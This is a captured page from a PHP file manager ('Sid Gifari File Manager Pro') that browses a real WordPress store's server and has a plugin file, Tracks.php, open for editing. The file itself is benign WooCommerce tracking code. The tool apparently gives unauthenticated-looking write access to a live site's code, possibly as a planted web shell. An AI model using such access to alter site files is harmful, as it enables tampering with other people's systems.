🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-19 11:26:00 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
thedasstores.com
/
wp-content
/
plugins
/
google-listings-and-ads
/
src
/
Proxies
📍 /home/therahul/thedasstores.com/wp-content/plugins/google-listings-and-ads/src/Proxies
🔄 Refresh
✏️
Editing: Tracks.php
Writable
<?php declare( strict_types=1 ); namespace Automattic\WooCommerce\GoogleListingsAndAds\Proxies; use WC_Tracks; /** * Class Tracks * * @package Automattic\WooCommerce\GoogleListingsAndAds\Proxies */ class Tracks { /** * Record a tracks event. * * @param string $name The event name to record. * @param array $properties Array of properties to include with the event. */ public function record_event( string $name, array $properties = [] ): void { if ( class_exists( WC_Tracks::class ) ) { WC_Tracks::record_event( $name, $properties ); } elseif ( function_exists( 'wc_admin_record_tracks_event' ) ) { wc_admin_record_tracks_event( $name, $properties ); } } }
💾 Save Changes
❌ Cancel